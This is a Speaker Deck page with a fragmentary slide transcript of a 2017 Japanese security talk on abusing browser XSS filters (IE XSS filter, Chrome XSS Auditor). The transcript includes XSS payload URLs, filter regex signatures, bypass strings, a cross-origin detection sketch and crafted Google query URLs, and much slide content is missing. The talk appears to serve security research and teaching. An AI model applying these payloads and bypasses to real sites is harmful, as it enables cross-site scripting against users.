Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

Masato Kinugawa
March 31, 2017
Technology
7
2.6k

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。

Masato Kinugawa

March 31, 2017
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
5.9k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
84k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
19k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
11k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
19k
ブラウザのUIのバグを探す / Secusoba PopUnder
masatokinugawa
2
1.7k
攻撃者視点で見る Service Worker / PWA Study SW
masatokinugawa
20
24k
USAGE OF XSS FILTER
masatokinugawa
4
2.5k
XSS Attacks through PATH
masatokinugawa
8
16k

Other Decks in Technology

See All in Technology
QMファンネルとQAキャリア
gen519
PRO
1
190
PHPマジックメソッドクイズ!/PHP Magic Method Quiz
ykanoh
0
110
『登記所備付地図XMLデータ』に触れてみよう〜法務省が公開した大規模オープンデータとは一体何なのか〜 / What is moj map xml
sakaik
0
150
計測できるレガシーさを捉え、コード改善に対処する / phperkaigi2023
blue_goheimochi
0
210
PHPの最高機能、配列を捨てよう!! / Throw away all PHP array now!!!
uzulla
8
4.9k
軽率に休学したら Babylon.js×WebARで 夢を3つ叶えてた / my dreams with babylon.js and WebAR
drumath2237
0
140
React開発における失敗事例と学び〜実例3選とともに〜
bitkey
PRO
1
290
他言語と比較して今こそ理解しよう! 目指せ、列挙型マスター!
soachr
0
110
ChatGPTをプロダクトに入れる開発が"毎日がAfter GPT"だった件/ChatGPT LT Link and Motivation
lmi
1
3.1k
replace of cart system on ZOZOTOWN
takahashikazutaro
0
370
エンジニアのためのマネジメント入門/Introduction to Management for Software Engineers
dskst
1
350
新卒入社から1500人規模のCTOに: エンジニアが圧倒的に成長する3つのコツ / 技育祭2023春
carta_engineering
1
800

Featured

See All Featured
Java REST API Framework Comparison - PWX 2021
mraible
PRO
14
5.6k
Fireside Chat
paigeccino
16
2k
In The Pink: A Labor of Love
frogandcode
133
21k
Automating Front-end Workflow
addyosmani
1351
200k
Ruby is Unlike a Banana
tanoku
93
9.6k
Git: the NoSQL Database
bkeepers
PRO
419
60k
Happy Clients
brianwarren
90
5.9k
The Language of Interfaces
destraynor
149
21k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
224
50k
Infographics Made Easy
chrislema
236
17k
Robots, Beer and Maslow
schacon
154
7.4k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
32
7.3k

Transcript

  1. View Slide

  2. View Slide





  3. View Slide

  4. View Slide

  5. https://example.com/?q=">


    ">



    View Slide

  6. https://example.com/?q=">


    ">



    View Slide

  7. https://addons.mozilla.org/ja/firefox/addon/noscript/

    View Slide

  8. HTTP/1.1 200 OK
    Date: Tue, 28 Mar 2017 06:16:00 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=UTF-8
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN

    View Slide

  9. View Slide

  10. View Slide

  11. View Slide

  12. https://example.com/?q=">
    https://example.com/#5382863726995448701


    ">
    ">

    View Slide

  13. View Slide

  14. ">


    https://example.com/?q=">

    View Slide

  15. ">


    https://example.com/?q=">

    View Slide

  16. https://example.com/?q=">
    https://example.com/#5382863726995448701


    View Slide

  17. <script> - Google 検索
    (function(){window.google={kEI: [...]<br/>https://www.google.co.jp/search?q=<script><br/><br/>

    View Slide


  18. <br/>if(jQuery){<br/>// Expected<br/>}else{<br/>// ???<br/>}<br/>
    https://example.com/?

    View Slide

  19. View Slide

  20. {{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}}
    [...]
    {(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0
    *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)
    |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63)
    );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|
    (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|
    A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta
    b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}
    {{}
    {{[...]
    {{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
    {[...]
    ">

    View Slide

  21. [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.
    ">

    View Slide

  22. ">
    [\"\'][ ]*(([^a-z0-
    9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee]))
    )).+?{\(}.*?{\)}
    x="";alert(1)//"

    View Slide

  23. View Slide

  24. https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-
    2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
    http://d.hatena.ne.jp/teracc/20090622

    View Slide

  25. https://www.slideshare.net/masatokinugawa/xxn-ja

    View Slide

  26. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    <br/>q = "";document#body.innerHTML="<xss>";<br/>
    URL: ?q=";document.body.innerHTML="

    View Slide

  27. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    <br/><script src="//example.co.jp/test.js"<br/>type="text/javascript"><br/>
    URL: ?"/++.+++=

    View Slide

  28. "style=:\
    javascript:-
    vbscript:-
    vbs:-
    ",x[]=
    "{toString:
    "{valueOf:

    View Slide

  29. type="text/javascript">

    View Slide

  30. window#name//Syntax Error
    window^name//Syntax OK
    window.name<br/>

    View Slide

  31. View Slide

  32. url=location.search.slice(1);
    if(url^indexOf(":")!=-1){
    url=null;
    }
    onload=function(){
    if(url){location=url;}
    }

    View Slide

  33. https://example.com/?q=";alert`1`//

    <br/>q = "";alert`1`//";<br/>
    https://www.slideshare.net/x00mario/es6-en/34
    ECMAScript 6 from an Attacker's Perspective
    - Breaking Frameworks, Sandboxes, and everything else

    View Slide

  34. https://example.com/?q=${alert(1)}``//&`+++`

    https://example.com/?q=[USER_INPUT]

    <br/>foo=``;<br/>q="[USER_INPUT]";<br/>
    <br/>foo=`#;<br/>q="${alert(1)}#`//";<br/>

    View Slide

  35. https://example.com/?+onfiles+++=.

    type="text/javascript">

    [...]

    View Slide

  36. https://bugs.chromium.org/p/chromium/issues/detail?id=654794

    View Slide

  37. View Slide

  38. http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html

    View Slide

  39. https://VICTIM/
    https://VICTIM/?

    IFRAME ERROR
    https://ATTACKER/

    win=window.open(…) if(win.length == 0){
    //
    //
    }else{
    //
    }

    View Slide






  40. View Slide

  41. https://www.youtube.com/watch?v=IMDWjKFbsJE

    View Slide

  42. HTTP/1.1 200 OK
    [...]
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN

    View Slide

  43. https://accounts.google.com/ServiceLogin?

    View Slide

  44. google.ae
    google.as
    google.ca
    google.co
    google.co.in
    google.co.jp
    google.co.kr
    google.co.nz
    google.co.uk
    google.com.br
    google.com.mx
    google.de
    google.es
    google.fr
    google.it
    google.pl
    google.pt
    google.ru
    ...(

    View Slide




  45. View Slide

  46. {

    View Slide

  47. 0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/

    View Slide

  48. 0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/?

    View Slide

  49. 0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/?

    View Slide

  50. 0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    [email protected]_
    A a
    0x00
    0-9 <
    B-Z b-z

    View Slide

  51. 0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    [email protected]_
    A a
    0x00
    0-9 <
    B-Z b-z

    View Slide

  52. [email protected]
    {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

    View Slide





  53. View Slide

  54. [email protected]

    View Slide

  55. https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=

    View Slide

  56. https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=

    View Slide

  57. https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ca/?"[email protected]=
    ...

    View Slide




  58. View Slide

  59. View Slide

  60. View Slide

  61. View Slide

  62. View Slide




  63. View Slide






  64. View Slide







  65. View Slide

  66. View Slide